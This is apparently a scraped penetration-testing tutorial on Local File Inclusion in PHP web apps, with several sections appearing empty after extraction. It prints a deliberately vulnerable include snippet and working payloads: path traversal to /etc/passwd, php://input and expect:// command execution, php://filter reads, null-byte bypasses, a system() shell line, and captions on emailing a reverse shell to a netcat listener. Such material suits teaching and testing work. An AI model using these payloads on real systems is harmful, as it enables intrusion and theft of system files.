Local File Inclusion (LFI) — Web Application Penetration Testing

Introduction

Main Chapters

  • What is a Local File Inclusion (LFI) vulnerability?
  • Identifying LFI Vulnerabilities within Web Applications
  • PHP Wrappers
  • LFI via /proc/self/environ
  • Null Byte Technique
  • Truncation LFI Bypass
  • Log File Contamination
  • Email a Reverse Shell

What is a Local File Inclusion (LFI) vulnerability?

<?php

$file = $_GET[‘file’];

if(isset($file))

{

include(“pages/$file”);

}

else

{

include(“index.php”);

}

?>

Identifying LFI Vulnerabilities within Web Applications

/script.php?page=index.html

/script.php?page=../../../../../../../../etc/passwd

PHP Wrappers

PHP Expect Wrapper

php?page=expect://ls

/fi/?page=php://input&cmd=ls

POST request using php://input
The output from the command “ls” is rendered above the DVWA banner.

PHP php://filter

vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

Image showing the base64 encoded text at the top of the rendered page
An image showing the base64 decoded output from /etc/passwd on a UNIX / Linux system

?page=php://filter/resource=/etc/passwd

An image showing the output from /etc/passwd on a UNIX / Linux system using php://filter

PHP ZIP Wrapper LFI

LFI via /proc/self/environ

Useful Shells

<? system(‘uname -a’);?>

Null Byte Technique

vuln.php?page=/etc/passwd%00

vuln.php?page=/etc/passwd%2500

Truncation LFI Bypass

Log File Contamination

Apache / Nginx

Email a Reverse Shell

The above image uses the smtp-user-enum script confirming the www-data user exists on the system
The above image shows the process of sending a reverse PHP shell via SMTP using telnet
The above image shows the inclusion of www-data mail spool file containing the emailed PHP reverse shell code
The above image shows the emailed PHP reverse shell connecting to a netcat listener

References

--

--

--

Aptive Cyber Security are a UK provider of Penetration Testing Services. https://twitter.com/AptiveSec https://about.me/aptive

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Try Gitlab application security first time

Cryptohots KOD Certification

Here.TV ⋆ 06 Months Warranty

The biggest thing you can do for your security is apply those annoying software updates

Software Update screen on macOS

Footprinting and Reconnaissance in Ethical Hacking

Superfluid Community Call #6

What are all the types of tokens used in our platform?

Vital Pieces of Wireless LAN

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aptive

Aptive

Aptive Cyber Security are a UK provider of Penetration Testing Services. https://twitter.com/AptiveSec https://about.me/aptive

More from Medium

SQL injection & Wordpress Explotiation: Welok, Try Hack Me

Attacktive Directory | TryHackMe

Hack The Box: Lame

How To Write A Simple PHP Shell